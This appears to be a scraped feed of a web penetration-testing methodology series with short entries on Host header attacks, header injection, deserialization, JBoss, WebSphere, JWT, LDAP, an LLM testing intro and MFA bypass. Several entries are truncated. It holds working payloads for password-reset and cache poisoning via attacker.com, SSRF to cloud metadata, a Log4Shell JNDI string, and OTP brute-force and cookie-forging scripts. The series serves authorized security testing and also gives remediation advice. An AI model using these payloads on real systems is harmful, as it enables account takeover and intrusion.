Authentication is per-connection or per-call via metadata headers
Four communication patterns: unary, server-streaming, client-streaming, bidirectional streaming
gRPC-Web is a browser-compatible variant proxied through HTTP/1.1 or HTTP/2

gRPC attack surface:
  gRPC Reflection → full service/method enumeration (like introspection in GraphQL)
  Metadata headers → auth bypass (incorrect header parsing, case sensitivity)
  Protobuf fuzzing → buffer overflow, type confusion in custom parsers
  Authorization on service vs method level → method-level bypass
  gRPC-Web proxy → HTTP/1.1 wrapper enables Burp interception without plugin

Discovery Checklist

Phase 1 — Service Discovery

Host Header Attacks

Tue, 24 Feb 2026 00:00:00 +0000

Host Header Attacks

Severity: High–Critical | CWE: CWE-20, CWE-601 OWASP: A05:2021 – Security Misconfiguration

What Are Host Header Attacks?

The HTTP Host header tells the server which virtual host to serve. Applications that trust Host blindly for link generation, password reset emails, routing, or cache keying are vulnerable. Manipulation leads to: password reset poisoning, cache poisoning, SSRF, routing bypass, and XSS.

GET /reset-password?token=abc123 HTTP/1.1
Host: attacker.com             ← injected

App sends email: "Click: https://attacker.com/reset?token=abc123"
Victim clicks → attacker receives token → account takeover

Discovery Checklist

Modify Host: to an attacker-controlled domain — check if reflected in response/emails
Test X-Forwarded-Host:, X-Host:, X-Forwarded-Server:, X-HTTP-Host-Override:
Test with port appended: Host: target.com:evil.com
Test password reset flow with poisoned Host header
Check if Host is used to generate absolute URLs in HTML/JSON responses
Test cache poisoning via unkeyed Host header
Test with duplicate Host: headers
Test absolute-form request URI with different Host header
Test routing bypass to internal services via Host manipulation
Test X-Forwarded-For + X-Real-IP for IP-based auth bypass
Check for SSRF via Host header (internal service routing)

Payload Library

Attack 1 — Password Reset Poisoning

# Step 1: Request password reset for victim account
# Step 2: Intercept request, modify Host header to attacker-controlled domain

POST /forgot-password HTTP/1.1
Host: attacker.com            ← poisoned
Content-Type: application/x-www-form-urlencoded

email=victim@corp.com

# App generates: https://attacker.com/reset?token=VICTIM_TOKEN
# Victim receives email, clicks link → token delivered to attacker.com
# Attacker uses token to reset victim's password

# Alternative override headers to test:
POST /forgot-password HTTP/1.1
Host: target.com
X-Forwarded-Host: attacker.com    ← many frameworks prefer this

POST /forgot-password HTTP/1.1
Host: target.com
X-Host: attacker.com

POST /forgot-password HTTP/1.1
Host: target.com
X-Forwarded-Server: attacker.com

# Via port injection — Host: target.com:@attacker.com
# Some parsers treat :@ as userinfo separator
Host: target.com:@attacker.com

Attack 2 — Web Cache Poisoning via Host Header

# If cache key doesn't include Host header (unkeyed header):
GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: attacker.com

# App generates response with:
# <script src="https://attacker.com/app.js"></script>
# Cache stores this under the key for target.com/
# All subsequent users get the poisoned response (XSS)

# Or via Host header directly if cache doesn't normalize:
GET / HTTP/1.1
Host: attacker.com

# Check if X-Cache: HIT on second request → cached with poisoned Host
curl -s -I https://target.com/ -H "X-Forwarded-Host: attacker.com" | grep -i "x-cache\|location"

Attack 3 — Routing to Internal Services

# Virtual host routing — different Host routes to different backend:
# Normal: Host: target.com → public app
# Internal: Host: internal.admin → admin panel

GET /admin HTTP/1.1
Host: internal.admin
# If proxy routes by Host header and doesn't enforce allowlist:
# → May access internal admin panel

# Try common internal Host values:
Host: localhost
Host: 127.0.0.1
Host: internal
Host: admin
Host: admin.target.com
Host: internal.target.com
Host: staging.target.com
Host: dev.target.com

# Absolute request URI bypass:
GET http://internal.service/admin HTTP/1.1
Host: target.com
# The absolute URI takes precedence over Host in some proxies

Attack 4 — Duplicate Host Header

# Some servers use first Host, some use last, some concatenate:
GET / HTTP/1.1
Host: target.com
Host: attacker.com

# Test which value is reflected in response or used for routing
# WAF may check first, app may use second

# Host header with double value (inline):
Host: target.com, attacker.com
Host: target.com attacker.com    # space-separated

Attack 5 — SSRF via Host Header

# If server uses Host header to make server-side requests:
GET / HTTP/1.1
Host: 169.254.169.254            # AWS metadata

GET / HTTP/1.1
Host: internal-api:8080          # internal service

GET / HTTP/1.1
Host: collaborator.oast.pro      # OOB detection

# With port manipulation:
Host: target.com:80@169.254.169.254  # userinfo injection

Attack 6 — X-Forwarded-For IP Bypass

# Bypass IP-based restrictions (admin panel requires 127.0.0.1):
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

GET /admin HTTP/1.1
Host: target.com
X-Real-IP: 127.0.0.1

GET /admin HTTP/1.1
Host: target.com
X-Originating-IP: 127.0.0.1

GET /admin HTTP/1.1
Host: target.com
Client-IP: 127.0.0.1

GET /admin HTTP/1.1
Host: target.com
True-Client-IP: 127.0.0.1

GET /admin HTTP/1.1
Host: target.com
Forwarded: for=127.0.0.1;by=127.0.0.1;host=target.com

# Bypass rate limits — change IP per request:
X-Forwarded-For: 1.2.3.4    # rotate through IPs
X-Forwarded-For: 10.0.0.1

Tools

# Burp Suite:
# - Proxy → all requests → add/modify Host header
# - Repeater for manual testing
# - Param Miner extension (BApp): discovers unkeyed headers including Host variants
# - Active Scan for Host header injection

# Param Miner (Burp extension):
# Right-click request → Extensions → Param Miner → Guess Headers
# Automatically discovers reflected/unkeyed headers

# curl with custom Host:
curl -s -H "Host: attacker.com" https://target.com/ | grep -i "attacker"
curl -s -H "X-Forwarded-Host: attacker.com" https://target.com/ | grep -i "attacker"

# Check password reset email generation:
# Use Burp Collaborator as Host value, trigger password reset,
# check Collaborator for incoming DNS/HTTP (confirms Host is used in email)

# Test all override headers at once:
for header in "X-Forwarded-Host" "X-Host" "X-HTTP-Host-Override" \
              "X-Forwarded-Server" "X-Original-Host"; do
  echo "Testing: $header"
  curl -s -H "$header: attacker.oast.pro" https://target.com/ | \
    grep -i "attacker" | head -2
done

# Collaborator-based detection:
# Set Host to your Collaborator ID, trigger various actions,
# monitor for DNS/HTTP callbacks

Remediation Reference

Hardcode the expected hostname: configure web framework with ALLOWED_HOSTS (Django), server_name (Nginx), ServerName (Apache) — reject any other Host value
Never trust X-Forwarded-Host for URL generation unless behind a known trusted proxy
Generate absolute URLs from configuration, not from the request’s Host header
Cache key discipline: ensure Host (and override headers) are either in cache key or stripped before caching
IP allowlist enforcement: don’t rely solely on X-Forwarded-For for IP-based access control — verify at network layer
Password reset links: use relative paths or server-configured base URL — never construct from Host header

Part of the Web Application Penetration Testing Methodology series.

HTTP Header Injection / Response Splitting

Tue, 24 Feb 2026 00:00:00 +0000

HTTP Header Injection / Response Splitting

Severity: High | CWE: CWE-113, CWE-74 OWASP: A03:2021 – Injection

What Is HTTP Header Injection?

HTTP header injection occurs when user-controlled data is inserted into HTTP response headers without proper sanitization. CRLF sequences (\r\n / %0d%0a) terminate the current header and inject new ones — enabling response splitting, cache poisoning, session fixation, and XSS via injected HTML body.

Vulnerable redirect:
  Location: https://target.com/redirect?url=USER_INPUT

Injected input: attacker.com\r\nSet-Cookie: session=EVIL

Response becomes:
  HTTP/1.1 302 Found
  Location: https://target.com/redirect?url=attacker.com
  Set-Cookie: session=EVIL        ← injected new header

Response Splitting (HTTP/1.1): inject \r\n\r\n to terminate headers and start injected body:

HTTP Parameter Pollution (HPP)

Tue, 24 Feb 2026 00:00:00 +0000

HTTP Parameter Pollution (HPP)

Severity: Medium–High | CWE: CWE-235, CWE-20 OWASP: A03:2021 – Injection | A01:2021 – Broken Access Control

What Is HTTP Parameter Pollution?

HTTP Parameter Pollution exploits the inconsistent behavior of web servers and application frameworks when handling duplicate parameter names in HTTP requests. When ?id=1&id=2 is received, different technologies resolve the conflict differently — and the attacker can exploit the gap between what the WAF/front-end sees and what the back-end application processes.

HTTP/2 Rapid Reset (CVE-2023-44487)

Tue, 24 Feb 2026 00:00:00 +0000

HTTP/2 Rapid Reset (CVE-2023-44487)

Severity: High (DoS) | CWE: CWE-400 OWASP: A05:2021 – Security Misconfiguration

What Is HTTP/2 Rapid Reset?

HTTP/2 Rapid Reset is a DoS amplification technique that exploits the HTTP/2 stream multiplexing mechanism. In HTTP/2, a client can open multiple concurrent streams on a single TCP connection and cancel them immediately with a RST_STREAM frame — before the server has finished processing them.

The attack pattern:

Client sends HEADERS frame (initiates a request on stream N)
Client immediately sends RST_STREAM frame (cancels stream N)
Repeat at high rate — the server must still process each HEADERS frame before seeing the reset

The server incurs full request parsing and dispatch cost per stream. The client incurs almost none — it resets before receiving any response. This asymmetry is the amplification vector.

HTTP/2 Request Smuggling

Tue, 24 Feb 2026 00:00:00 +0000

HTTP/2 Request Smuggling

Severity: Critical | CWE: CWE-444 OWASP: A02:2021 – Cryptographic Failures / A05:2021 – Security Misconfiguration

What Is HTTP/2 Smuggling?

HTTP/2 uses a binary framing layer with explicit frame lengths — there is no Content-Length or Transfer-Encoding ambiguity within a true HTTP/2 connection. Smuggling occurs at the H2→H1 downgrade boundary: a front-end proxy accepts HTTP/2 but forwards to a back-end over HTTP/1.1. Two main attack variants:

H2.CL — Front-end ignores HTTP/2 framing length,
         uses attacker-supplied Content-Length to forward to backend.
         Backend processes CL but sees extra bytes as a new request.

H2.TE — Front-end strips Transfer-Encoding header received in H2,
         but attacker-supplied TE header survives downgrade.
         Backend sees chunked encoding → processes smuggled prefix.

H2.0   — HTTP/2 cleartext (h2c) upgrade smuggling
         (CONNECT-based tunnel abuse)

Key difference from H1 smuggling: HTTP/2 headers are pseudo-headers (:method, :path, :scheme, :authority) — injecting newlines in header values can create entirely new HTTP/1.1 headers after downgrade.

IBM MQ

Tue, 24 Feb 2026 00:00:00 +0000

Overview

IBM MQ (formerly MQSeries, WebSphere MQ) is an enterprise message-oriented middleware platform used in banking, finance, and large enterprise environments for reliable, transactional message delivery between applications. Exposed IBM MQ ports can enable attackers to enumerate queues, read and inject messages into business-critical message flows, and potentially escalate to application-level compromise. The protocol is binary but well-documented; several tools exist for security testing.

End of Support Notice (2026): IBM MQ 9.1 and 9.2 have reached End of Support. CVE-2021-38920 and similar vulnerabilities disclosed during their support window are critical for organizations still running these versions, as no further patches will be released. Current supported versions are 9.3 LTS and 10.0. If the target is running 9.1 or 9.2, treat all known CVEs as unpatched.

IBM WebSphere Application Server

Tue, 24 Feb 2026 00:00:00 +0000

Overview

IBM WebSphere Application Server (WAS) is an enterprise Java EE application server widely deployed in large financial institutions, insurance companies, and government agencies. It is frequently found in legacy environments running outdated versions. WebSphere’s administrative console, SOAP-based management interface, and complex deployment history have produced numerous security vulnerabilities including path traversal, authentication bypass, SOAP deserialization, and SSRF.

Default Ports:

Port	Service
9060	WAS Admin Console (HTTP)
9043	WAS Admin Console (HTTPS)
9080	Application HTTP
9443	Application HTTPS
8880	SOAP management port
8879	RMI port (alternative/complement to 8880 SOAP)
2809	IIOP bootstrap
9353	SIB service integration bus
7276	High Availability Manager
9810	Node Agent bootstrap port (clustered/ND environments)

Recon and Fingerprinting

nmap -sV -p 9060,9043,9080,9443,8880 TARGET_IP
nmap -p 9080 --script http-title,http-headers TARGET_IP

# Admin console discovery
curl -sv http://TARGET_IP:9060/ibm/console/ 2>&1 | grep -iE "websphere|ibm|console"
curl -sv https://TARGET_IP:9043/ibm/console/ -k 2>&1 | grep -iE "websphere|ibm|console"

# Version from error pages
curl -s http://TARGET_IP:9080/nonexistent_$(date +%s) | grep -i websphere

# HTTP headers
curl -I http://TARGET_IP:9080/

Version Detection Endpoints

# SOAP management API — get version
curl -s -k "https://TARGET_IP:8880/ibm/console/secure/isAlive.jsp"

# IBM console status
curl -s -k "https://TARGET_IP:9043/ibm/console/login.do"

# Admin console
for port in 9060 9043; do
  CODE=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET_IP:$port/ibm/console/")
  echo "Port $port: $CODE"
done

# IBMWebAS server header
curl -s -I http://TARGET_IP:9080/ | grep -i "ibm\|websphere"

CVE-2020-4534 — Path Traversal

CVSS: 6.1 Medium Affected: IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0 (before specific fix packs) Type: Path traversal / open redirect CWE: CWE-22

IDOR / BOLA: Insecure Direct Object Reference

Tue, 24 Feb 2026 00:00:00 +0000

IDOR / BOLA: Insecure Direct Object Reference

Severity: High–Critical | CWE: CWE-639 OWASP: A01:2021 – Broken Access Control API Security: OWASP API Top 10 — API1:2023 BOLA

What Is IDOR / BOLA?

IDOR (Insecure Direct Object Reference) occurs when an application uses a user-controllable identifier (ID, filename, hash) to access a resource without verifying that the requesting user is authorized to access it.

BOLA (Broken Object Level Authorization) is the API-centric term — same concept, different vocabulary. It is the #1 API vulnerability class.

IMAP/SMTP Header Injection

Tue, 24 Feb 2026 00:00:00 +0000

IMAP/SMTP Header Injection

Severity: Medium–High | CWE: CWE-93, CWE-20 OWASP: A03:2021 – Injection

What Is Mail Injection?

Mail injection occurs when user-controlled data is inserted into email headers (To, CC, BCC, Subject, From) or SMTP commands without sanitization. A CRLF sequence (\r\n) in an email header terminates the current header and injects new headers — allowing attackers to:

Add BCC recipients — send to arbitrary addresses (spam amplification)
Inject additional To/CC — mass mailing abuse
Override From — phishing from trusted domain
Inject SMTP commands — in raw SMTP injection scenarios
Add arbitrary headers — X-Mailer manipulation, content injection

IMAP injection targets IMAP protocol commands when user input is interpolated into IMAP queries (less common, covered in Phase 2).

Insecure Deserialization — .NET

Tue, 24 Feb 2026 00:00:00 +0000

Insecure Deserialization — .NET

Severity: Critical | CWE: CWE-502 OWASP: A08:2021 – Software and Data Integrity Failures

What Is .NET Deserialization?

.NET has multiple serialization formats and deserializers — each with different gadget chains. The most dangerous are BinaryFormatter and SoapFormatter (both removed/disabled in .NET 5+), but many legacy applications still use them. JSON.NET (Newtonsoft.Json) is vulnerable to type confusion when TypeNameHandling is set insecurely.

BinaryFormatter:  binary format — .NETSEC magic bytes: 00 01 00 00 00
SoapFormatter:    XML/SOAP format — <SOAP-ENV:Envelope>
LosFormatter:     ViewState format — /w...
ObjectStateFormatter: ASP.NET ViewState (HMAC-signed but weak key)
JSON.NET:         {"$type":"System.Windows.Data.ObjectDataProvider,..."}
DataContractSerializer: XML with type hints

ysoserial.net is the primary tool — equivalent of ysoserial for Java.

Insecure Deserialization — Node.js

Tue, 24 Feb 2026 00:00:00 +0000

Insecure Deserialization — Node.js

Severity: Critical | CWE: CWE-502 OWASP: A08:2021 – Software and Data Integrity Failures

What Is Node.js Deserialization?

Unlike Java/PHP, Node.js doesn’t have a single dominant serialization format. Vulnerabilities arise in:

node-serialize — uses IIFE pattern (_$$ND_FUNC$$_) to embed executable functions
cryo — serializes functions, exploitable via custom class injection
serialize-javascript — meant for safe serialization but misused
__proto__ pollution via JSON.parse — not deserialization per se but JSON-triggered prototype pollution
vm module escape — sandbox breakout when deserializing into vm context
Cookie/session forgery — express-session with weak secret, cookie-parser with known secret

// node-serialize vulnerable pattern:
var serialize = require('node-serialize');
var data = cookieParser.parse(req.headers.cookie)['profile'];
var obj = serialize.unserialize(data);  // ← RCE if IIFE in data

Discovery Checklist

Phase 1 — Identify Serialization

Insecure Deserialization — Python

Tue, 24 Feb 2026 00:00:00 +0000

Insecure Deserialization — Python

Severity: Critical | CWE: CWE-502 OWASP: A08:2021 – Software and Data Integrity Failures

What Is the Attack Surface?

Python’s deserialization ecosystem is broader than most developers realize. Beyond the infamous pickle, there are PyYAML, marshal, shelve, jsonpickle, ruamel.yaml, dill, pandas.read_pickle(), and even numpy.load(). Each has distinct exploitation characteristics.

The core issue: these formats encode object type information alongside data. During deserialization, the runtime reconstructs arbitrary objects — and crafted payloads can execute code during that reconstruction.

Integer Overflow, Type Juggling & Type Confusion

Tue, 24 Feb 2026 00:00:00 +0000

Integer Overflow, Type Juggling & Type Confusion

Severity: Medium–Critical | CWE: CWE-190, CWE-843, CWE-704 OWASP: A03:2021 – Injection | A04:2021 – Insecure Design

What Are These Vulnerabilities?

Three related but distinct classes of numeric/type confusion vulnerabilities in web applications:

Integer Overflow: arithmetic wraps around when exceeding the integer type’s maximum value. Common in C extensions, Go, Rust FFI, and server-side quantity/price calculations.

PHP Type Juggling: PHP’s loose comparison (==) coerces types before comparing — "0e12345" == "0e67890" is true (both are scientific notation for 0), 0 == "anything_non_numeric" is true in PHP < 8, "1" == true is true.

Java Deserialization

Tue, 24 Feb 2026 00:00:00 +0000

Java Deserialization

Severity: Critical | CWE: CWE-502 OWASP: A08:2021 – Software and Data Integrity Failures

What Is Java Deserialization?

Java’s native serialization converts objects to a byte stream (serialize) and back to objects (deserialize). When an application deserializes attacker-controlled data, the attacker can provide a crafted byte stream that, when deserialized, executes arbitrary code — even before the application logic has a chance to inspect the data.

The execution happens through gadget chains: sequences of existing library classes whose methods, when invoked in sequence during deserialization, result in OS command execution. The attacker doesn’t inject new code — they exploit existing code already on the classpath.

Java RMI and RMI-IIOP

Tue, 24 Feb 2026 00:00:00 +0000

Overview

Java RMI (Remote Method Invocation) is Java’s built-in mechanism for executing methods on objects in remote JVMs. The RMI registry, by default on port 1099, acts as a directory service for remote objects. Because RMI uses Java serialization for all object transport, exposed RMI endpoints are classic deserialization attack surfaces. When paired with outdated Commons Collections, Spring, or other library gadget chains, unauthenticated RCE is frequently achievable. RMI-IIOP extends this over the CORBA IIOP protocol.

JBoss Application Server

Tue, 24 Feb 2026 00:00:00 +0000

Overview

JBoss Application Server (now WildFly) is a Java EE-compliant application server developed by Red Hat. Legacy JBoss installations (versions 3.x through 6.x) are infamous for unauthenticated remote code execution, primarily through exposed management consoles and Java deserialization vulnerabilities. Versions 4.x and 5.x in particular are found frequently in legacy enterprise environments and are among the most exploitable services during penetration tests.

Default Ports:

Port	Service
8080	HTTP / Web Console / JMX Console
8443	HTTPS
4444	JBoss Remoting / JNDI
4445	JBoss Remoting (secondary)
1099	RMI Registry
8009	AJP Connector
9990	WildFly Admin Console (newer versions)
9999	WildFly Management Native

Recon and Fingerprinting

nmap -sV -p 8080,8443,4444,4445,1099,9990 TARGET_IP
nmap -p 8080 --script http-title,http-headers,http-server-header TARGET_IP

# Check for JBoss headers
curl -sv http://TARGET_IP:8080/ 2>&1 | grep -iE "server:|X-Powered-By:|jboss"

# Version from status page
curl -s http://TARGET_IP:8080/status
curl -s http://TARGET_IP:8080/web-console/ServerInfo.jsp

# Error page fingerprint
curl -s http://TARGET_IP:8080/nopage_$(date +%s) | grep -i "jboss\|jbossas\|wildfly"

Sensitive URLs to Probe

# JMX Console (unauthenticated in JBoss 4.x by default)
curl -sv http://TARGET_IP:8080/jmx-console/

# Web Console
curl -sv http://TARGET_IP:8080/web-console/

# Admin Console
curl -sv http://TARGET_IP:8080/admin-console/

# JBoss WS
curl -sv http://TARGET_IP:8080/jbossws/

# Management API (WildFly/JBoss 7+)
curl -sv http://TARGET_IP:9990/management

# Invoker servlet
curl -sv http://TARGET_IP:8080/invoker/JMXInvokerServlet
curl -sv http://TARGET_IP:8080/invoker/EJBInvokerServlet

CVE-2017-12149 vs CVE-2015-7501 — Endpoint Distinction

These two CVEs are frequently conflated. They use the same ysoserial CommonsCollections gadgets but target different endpoints with different underlying components:

JWT Attacks

Tue, 24 Feb 2026 00:00:00 +0000

JWT Attacks

Severity: High–Critical | CWE: CWE-347 OWASP: A02:2021 – Cryptographic Failures

What Is a JWT?

A JSON Web Token consists of three base64url-encoded parts separated by dots:

HEADER.PAYLOAD.SIGNATURE

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9   ← header: {"alg":"HS256","typ":"JWT"}
.eyJzdWIiOiJ1c2VyMTIzIiwicm9sZSI6InVzZXIifQ  ← payload: {"sub":"user123","role":"user"}
.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c  ← HMAC-SHA256 signature

The server trusts the payload only if the signature is valid. Every attack targets the signature verification step.

Attack Surface

# Where JWTs appear:
Authorization: Bearer eyJ...
Cookie: token=eyJ...
Cookie: session=eyJ...
X-Auth-Token: eyJ...
POST body: {"token": "eyJ..."}
URL parameter: ?jwt=eyJ...

# Identify JWT:
- Three base64url segments separated by dots
- Starts with eyJ (base64 of {"al or {"ty)
- Can decode header/payload with: base64 -d (pad with = if needed)

Discovery Checklist

Find all JWT tokens in requests/responses
Decode header: echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d
Note alg field — is it HS256, RS256, none, ES256?
Test alg: none bypass
Test algorithm confusion: RS256 → HS256 with public key as secret
Test weak secret brute-force
Test kid header injection (SQL, path traversal, SSRF)
Test jku / x5u header injection (external JWK set)
Test jwk header embedding
Modify payload claims (role, admin, sub) — does server validate signature?

Payload Library

Attack 1 — `alg: none` (Unsigned Token)

Some libraries accept tokens with no signature when alg is set to none.

Kubernetes Security Testing

Tue, 24 Feb 2026 00:00:00 +0000

Kubernetes Security Testing

Severity: Critical | CWE: CWE-284, CWE-269 OWASP: A01:2021 – Broken Access Control | A05:2021 – Security Misconfiguration

What Is the Kubernetes Attack Surface?

Kubernetes clusters expose a rich attack surface: the API server (the central control plane), kubelet APIs on each node, etcd (cluster state store containing secrets in plaintext), dashboard UIs, and internal service mesh. Misconfigurations range from completely unauthenticated API servers to overly permissive RBAC rules, privileged containers, and default service account token abuse.

LDAP Injection

Tue, 24 Feb 2026 00:00:00 +0000

LDAP Injection

Severity: High–Critical | CWE: CWE-90 OWASP: A03:2021 – Injection

What Is LDAP Injection?

LDAP (Lightweight Directory Access Protocol) is used for authentication and directory lookup in enterprise environments — Active Directory, OpenLDAP, Oracle Directory Server. LDAP injection occurs when user input is inserted into LDAP filter queries without sanitization, allowing filter logic manipulation.

LDAP filter syntax:
  (&(uid=USERNAME)(password=PASSWORD))   ← AND: both must match

Injection:
  Username: admin)(&
  Filter becomes: (&(uid=admin)(&)(password=anything))
                             ↑ always-true subfilter → auth bypass

Two attack modes:

LLM Security Testing Methodology

Tue, 24 Feb 2026 00:00:00 +0000

LLM Security Testing Methodology

A practical methodology for security professionals testing LLM-based applications. Covers unprotected models, protected models (with guardrails), agentic systems, MCP servers, and RAG pipelines. Each target class requires a different approach, but they share a common reconnaissance foundation.

Test only on systems you are authorized to test. Route everything through Burp when in scope — LLM endpoints are HTTP endpoints, parameters are manipulable, request structure matters.

Key references:

Log Injection & Log4Shell Pattern

Tue, 24 Feb 2026 00:00:00 +0000

Log Injection & Log4Shell Pattern

Severity: Critical | CWE: CWE-117, CWE-74 OWASP: A03:2021 – Injection | A06:2021 – Vulnerable and Outdated Components

What Is Log Injection / Log4Shell Pattern?

Log Injection — embedding control characters or escape sequences in log entries to corrupt log files, inject fake entries, or exploit log viewers.

Log4Shell pattern — when a logging library performs JNDI lookups on log messages, attacker-controlled strings like ${jndi:ldap://attacker.com/x} trigger remote code execution. While Log4j2 was the major case, the JNDI injection pattern extends to any Java logging that interpolates log data.

Mass Assignment

Tue, 24 Feb 2026 00:00:00 +0000

Mass Assignment

Severity: High | CWE: CWE-915 OWASP: A03:2021 – Injection | A01:2021 – Broken Access Control

What Is Mass Assignment?

Mass assignment (also called auto-binding or object injection) occurs when a framework automatically binds HTTP request parameters to model/object properties without an allowlist. If an application exposes a User model and the attacker adds role=admin or isAdmin=true to the request, the ORM may silently set those fields.

The vulnerability is architectural — it exists in the gap between what the API intends to accept and what it actually binds.

MFA Bypass Techniques

Tue, 24 Feb 2026 00:00:00 +0000

MFA Bypass Techniques

Severity: Critical | CWE: CWE-304, CWE-287 OWASP: A07:2021 – Identification and Authentication Failures

What Is MFA Bypass?

Multi-Factor Authentication requires something you know + something you have/are. Bypasses exploit: logic flaws in implementation (skipping the MFA step), OTP brute force, session state manipulation, SS7/SIM attacks, phishing-in-real-time, and backup code abuse.

Discovery Checklist

Map the full auth flow: login → MFA challenge → success
Test skipping the MFA step entirely (direct navigate to post-auth page)
Test replaying the login-only session token before MFA completion
Test OTP brute force — is there a rate limit per account?
Test OTP reuse — can same OTP be used twice?
Test OTP validity window — accepts OTPs from past/future periods?
Test backup codes — length, entropy, reuse policy
Test “remember this device” bypass — forged cookie value
Test MFA skip via OAuth SSO (if SSO login doesn’t require MFA)
Test API endpoint directly vs web UI (API may skip MFA)
Test race condition on OTP validation
Test response manipulation — change mfa_required: true to false

Payload Library

Attack 1 — Step Skip / Flow Bypass

# Login with valid credentials → MFA challenge shown
# Instead of entering OTP, navigate directly to authenticated endpoint:

# Step 1: POST /login → response: {"status": "mfa_required", "session": "PARTIAL_SESSION"}
# Step 2: Instead of GET /mfa-verify, try:
curl -s https://target.com/dashboard \
  -b "session=PARTIAL_SESSION"

# Or: after /login, check if full session cookie is already set:
# If Set-Cookie: auth_session=... is in /login response → already authenticated?
curl -s -c cookies.txt -X POST https://target.com/login \
  -d "username=victim&password=password"
cat cookies.txt
# Use the session cookie directly:
curl -s https://target.com/account/profile -b "auth_session=VALUE"

# Test skipping via direct URL:
# /mfa-challenge?redirect=/admin → skip to /admin
curl -s "https://target.com/mfa-challenge?redirect=/admin" \
  -b "partial_session=VALUE"

Attack 2 — OTP Brute Force

# TOTP is 6 digits = 1,000,000 combinations
# But window is usually 30s → only 3 valid codes at a time
# Rate limiting is the critical defense

# Burp Intruder payload: 000000 to 999999
# Or generate wordlist:
python3 -c "
for i in range(1000000):
    print(f'{i:06d}')
" > otp_wordlist.txt

# ffuf:
ffuf -u https://target.com/verify-otp -X POST \
  -d "otp=FUZZ" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -b "session=PARTIAL_SESSION" \
  -w otp_wordlist.txt \
  -mc 302,200 -fr "Invalid OTP"

# Race condition burst (all within 30s window):
import threading, requests
def try_otp(code):
    r = requests.post("https://target.com/verify-otp",
        data={"otp": str(code).zfill(6)},
        cookies={"session": "PARTIAL_SESSION"},
        allow_redirects=False)
    if r.status_code != 200 or "Invalid" not in r.text:
        print(f"[HIT] {code}: {r.status_code}")

threads = [threading.Thread(target=try_otp, args=(i,)) for i in range(1000000)]
# Not practical, but for short-range: narrow window with timing

Attack 3 — Response Manipulation

# Intercept MFA verification response:
# Original failure response:
{"success": false, "mfa_verified": false, "message": "Invalid OTP"}
# Modified:
{"success": true, "mfa_verified": true, "message": "OTP verified"}

# Redirect-based bypass:
# Original: 302 to /mfa-challenge (OTP failed)
# Change to: 302 to /dashboard

# Boolean field manipulation:
# If response contains: {"require_mfa": true}
# Intercept and change: {"require_mfa": false}
# Then resend — if client-side logic processes this value

# Status code manipulation:
# 401 Unauthorized → 200 OK (some client-side apps trust status code)
# Change HTTP/1.1 401 to HTTP/1.1 200

Attack 4 — OTP Reuse and Extended Window

# Test OTP reuse:
# 1. Get valid OTP from authenticator app
# 2. Use it once (success)
# 3. Immediately try to use same OTP again
# → Should fail; if it succeeds → OTP not invalidated after use

# Test extended time window:
# Standard TOTP window: ±1 period (90s total)
# Test with: current OTP from 10 minutes ago
# → If app accepts → overly large window

# Test OTP from previous session:
# User A gets OTP, doesn't use it
# User B's account gets OTP submitted with User A's (stolen) OTP
# (Bypasses if OTPs aren't account-bound)

Attack 5 — Backup Code Enumeration

# Backup codes are typically 8-10 numeric digits
# Test brute force if no rate limit:
ffuf -u https://target.com/backup-code-verify -X POST \
  -d "code=FUZZ" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -b "session=PARTIAL_SESSION" \
  -w <(python3 -c "
for i in range(100000000):
    print(f'{i:08d}')
  ") -mc 302,200 -fr "Invalid"

# Backup code format patterns:
# XXXX-XXXX (8 hex groups)
# 123456789 (9 digits)
# abc12def (alphanumeric 8 chars)

# Test: if backup code only validated on front-end (JavaScript):
# Disable JS, submit any code → does server still validate?

Attack 6 — “Remember Device” Bypass

# If "remember this device for 30 days" stores a cookie:
# Test: forge a plausible "remember_device" token

# Common formats:
# base64(user_id + "|" + device_id)
# HMAC-SHA256 signed token (check for weak secret)
# Simple UUID or random string

# Extract legitimate "remember" cookie:
# Set-Cookie: remembered_device=BASE64_VALUE
echo "BASE64_VALUE" | base64 -d
# → user_id:12345:device:abc123:exp:1735000000

# Forge for admin:
echo -n "user_id:1:device:abc123:exp:9999999999" | base64
# Set cookie with forged value:
curl -s https://target.com/login \
  -d "username=admin&password=KNOWN" \
  -b "remembered_device=FORGED_VALUE"

Attack 7 — SIM Swap / SS7 (SMS-based OTP)

# Conceptual — not a web test, but relevant context:
# SMS OTP attacks:
# 1. SIM swap: social engineer carrier → receive victim's SMS
# 2. SS7 attack: intercept SMS at telecom level
# 3. SIM clone (physical access)
# 4. OTP phishing: real-time AITM proxy (Evilginx, Modlishka)

# Real-time phishing proxy (Evilginx):
# Sets up a reverse proxy that sits between victim and target
# Victim authenticates (including MFA) → proxy captures session cookie
# No need to bypass MFA technically — proxy passes it through and steals the session

# Test: is SMS OTP the only MFA option? Can attacker downgrade to SMS from TOTP?
# Try: change MFA method from TOTP to SMS in account settings

Attack 8 — API MFA Bypass

# Web UI enforces MFA but API endpoints may not:
# Test direct API access after password-only auth:

# Web login: POST /login → redirects to /mfa-verify
# API login: POST /api/v1/auth/login → returns token directly?

curl -s -X POST https://target.com/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": "password"}'
# → If returns {"token": "..."} without MFA → API bypass

# Mobile API may have separate endpoint:
POST /mobile/v2/auth/login    # different than web
POST /app/login               # mobile-specific

Tools

# Burp Suite:
# - Proxy: intercept MFA response → Repeater for manipulation
# - Intruder: OTP brute force with 000000-999999 payload
# - Turbo Intruder: race condition on OTP validation

# pyotp — generate valid TOTP codes (if secret is known/leaked):
pip3 install pyotp
python3 -c "import pyotp; print(pyotp.TOTP('SECRET_BASE32').now())"

# Test rate limiting — expect lockout after N attempts:
for i in $(seq 1 20); do
  curl -s -X POST https://target.com/verify-otp \
    -d "otp=$(printf '%06d' $i)" \
    -b "session=PARTIAL_SESSION" | head -1
done

# Evilginx (adversary-in-the-middle phishing framework):
# github.com/kgretzky/evilginx2
# For authorized phishing simulations only

# Monitor MFA response timing:
# Time-based oracle: correct OTP may take longer (DB lookup) vs wrong OTP
for otp in 000000 000001 123456; do
  time curl -s -X POST https://target.com/verify-otp \
